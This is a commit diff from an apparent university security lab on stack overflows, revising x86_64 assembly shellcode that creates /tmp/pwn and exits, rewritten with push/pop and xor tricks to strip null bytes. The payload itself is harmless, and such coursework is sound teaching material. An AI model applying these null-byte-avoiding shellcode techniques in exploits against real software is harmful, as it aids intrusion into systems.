Working shellcode but one \0 remains

2023-03-30 01:19:07 +02:00 · 2023-03-30 01:19:07 +02:00 · 2a4a11be20
commit 2a4a11be20
parent f4dd1b619e
1 changed files with 19 additions and 11 deletions
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
@ -2,19 +2,27 @@
 .globl _start

 _start:
-    call pwnd
+    call p
 	.asciz "/tmp/pwn"

-pwnd:
-    # We are on x86_64, we must move 8 bytes up from stack pointer
-    popq %rdi
-    movq $0666, %rsi
-    movq $85, %rax
-    syscall
-    ret
    
-    # exit(42)
-	movq $42, %rdi
-	movq $60, %rax
+p:
+    xorq %rdi, %rdi
+    pop %rdi
+    #shr $0x8, %rdi
+    push $0xfffffffffffffd66
+    xor %rsi, %rsi
+    pop %rsi
+    neg %rsi
+    push $85
+    pop %rax
    syscall

+    xorq %rax, %rax
+    xorq %rdi, %rdi
+	push $42
+    pop %rdi
+	push $61
+    pop %rax
+    lea -1(%rax), %rax
+	syscall